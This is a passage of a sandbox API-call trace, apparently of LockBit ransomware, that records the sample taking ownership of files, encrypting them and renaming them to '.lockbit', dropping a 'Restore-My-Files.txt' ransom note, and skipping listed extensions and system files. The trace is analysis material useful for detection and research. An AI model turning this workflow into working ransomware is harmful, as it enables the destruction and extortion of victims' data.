GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0091.054] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0091.055] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0091.056] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0091.056] RtlFreeAnsiString (AnsiString="\\") [0091.056] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x4b4) returned 0x0 [0091.057] malloc (_Size=0x200) returned 0x2071008 [0091.057] NtQueryInformationToken (in: TokenHandle=0x4b4, TokenInformationClass=0x1, TokenInformation=0x2071008, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x2071008, ReturnLength=0x3d6acd8) returned 0x0 [0091.057] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.057] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x2071010*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.057] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.057] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.058] CloseHandle (hObject=0x4b4) returned 1 [0091.058] free (_Block=0x2071008) [0091.058] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x4b4 [0091.058] CreateIoCompletionPort (FileHandle=0x4b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0091.058] malloc (_Size=0x40068) returned 0x3d70048 [0091.058] GetFileSizeEx (in: hFile=0x4b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=1589606) returned 1 [0091.058] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.060] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0091.060] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.062] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0091.062] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0091.071] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0091.071] malloc (_Size=0xce) returned 0x1ff1e60 [0091.071] NtSetInformationFile (FileHandle=0x4b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xce, FileInformationClass=0xa) returned 0x0 [0091.082] free (_Block=0x1ff1e60) [0091.082] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0091.082] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0091.082] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.082] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71deeca7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71deeca7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x50add351, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x189f26, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsMainToScenesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0091.082] lstrcmpiW (lpString1=".", lpString2="SportsMainToScenesBackground_PAL.wmv") returned -1 [0091.082] lstrcmpiW (lpString1="..", lpString2="SportsMainToScenesBackground_PAL.wmv") returned -1 [0091.083] PathFindExtensionW (pszPath="SportsMainToScenesBackground_PAL.wmv") returned=".wmv" [0091.083] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0091.083] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0091.084] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SportsMainToScenesBackground_PAL.wmv") returned -1 [0091.084] lstrcmpiW (lpString1="ntldr", lpString2="SportsMainToScenesBackground_PAL.wmv") returned -1 [0091.084] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SportsMainToScenesBackground_PAL.wmv") returned -1 [0091.084] lstrcmpiW (lpString1="bootsect.bak", lpString2="SportsMainToScenesBackground_PAL.wmv") returned -1 [0091.084] lstrcmpiW (lpString1="autorun.inf", lpString2="SportsMainToScenesBackground_PAL.wmv") returned -1 [0091.084] lstrcmpiW (lpString1="thumbs.db", lpString2="SportsMainToScenesBackground_PAL.wmv") returned 1 [0091.084] lstrcmpiW (lpString1="iconcache.db", lpString2="SportsMainToScenesBackground_PAL.wmv") returned -1 [0091.084] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0091.084] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned=".wmv" [0091.084] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0091.084] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0091.084] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0091.085] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0091.085] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv.lockbit") returned 96 [0091.085] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.087] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0091.088] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0091.088] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0091.089] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0091.090] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0091.090] RtlFreeAnsiString (AnsiString="\\") [0091.090] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x4b4) returned 0x0 [0091.090] malloc (_Size=0x200) returned 0x2071008 [0091.090] NtQueryInformationToken (in: TokenHandle=0x4b4, TokenInformationClass=0x1, TokenInformation=0x2071008, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x2071008, ReturnLength=0x3d6acd8) returned 0x0 [0091.090] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.090] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x2071010*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.090] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.091] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.091] CloseHandle (hObject=0x4b4) returned 1 [0091.091] free (_Block=0x2071008) [0091.091] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x4b4 [0091.091] CreateIoCompletionPort (FileHandle=0x4b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0091.091] malloc (_Size=0x40068) returned 0x3d70048 [0091.091] GetFileSizeEx (in: hFile=0x4b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=1613606) returned 1 [0091.091] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.093] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.093] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0091.093] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.095] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0091.095] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0091.103] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0091.103] malloc (_Size=0xd6) returned 0x1ff1e60 [0091.103] NtSetInformationFile (FileHandle=0x4b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xd6, FileInformationClass=0xa) returned 0x0 [0091.133] free (_Block=0x1ff1e60) [0091.133] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0091.134] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0091.134] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.134] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x713aae96, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x713aae96, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x514fb049, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6680f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsNotesBackground.wmv", cAlternateFileName="")) returned 1 [0091.134] lstrcmpiW (lpString1=".", lpString2="SportsNotesBackground.wmv") returned -1 [0091.134] lstrcmpiW (lpString1="..", lpString2="SportsNotesBackground.wmv") returned -1 [0091.134] PathFindExtensionW (pszPath="SportsNotesBackground.wmv") returned=".wmv" [0091.134] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0091.134] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0091.134] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0091.134] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0091.134] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0091.134] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0091.134] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0091.134] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0091.134] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0091.134] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0091.134] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0091.134] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0091.134] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0091.134] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0091.134] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0091.134] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0091.134] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0091.134] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0091.134] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0091.135] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0091.135] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SportsNotesBackground.wmv") returned -1 [0091.136] lstrcmpiW (lpString1="ntldr", lpString2="SportsNotesBackground.wmv") returned -1 [0091.136] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SportsNotesBackground.wmv") returned -1 [0091.136] lstrcmpiW (lpString1="bootsect.bak", lpString2="SportsNotesBackground.wmv") returned -1 [0091.136] lstrcmpiW (lpString1="autorun.inf", lpString2="SportsNotesBackground.wmv") returned -1 [0091.136] lstrcmpiW (lpString1="thumbs.db", lpString2="SportsNotesBackground.wmv") returned 1 [0091.136] lstrcmpiW (lpString1="iconcache.db", lpString2="SportsNotesBackground.wmv") returned -1 [0091.136] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0091.136] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned=".wmv" [0091.136] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0091.136] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0091.136] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0091.136] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0091.136] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0091.136] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0091.136] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0091.136] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0091.136] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0091.136] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0091.136] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0091.136] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0091.136] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0091.136] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0091.136] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0091.136] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0091.136] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0091.136] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0091.136] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0091.136] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0091.136] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0091.137] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0091.137] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0091.137] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0091.137] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0091.137] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0091.137] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0091.137] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0091.137] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv.lockbit") returned 85 [0091.137] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.138] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0091.140] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0091.140] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0091.140] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0091.141] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0091.142] RtlFreeAnsiString (AnsiString="\\") [0091.142] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x4b4) returned 0x0 [0091.142] malloc (_Size=0x200) returned 0x2071008 [0091.142] NtQueryInformationToken (in: TokenHandle=0x4b4, TokenInformationClass=0x1, TokenInformation=0x2071008, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x2071008, ReturnLength=0x3d6acd8) returned 0x0 [0091.142] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: 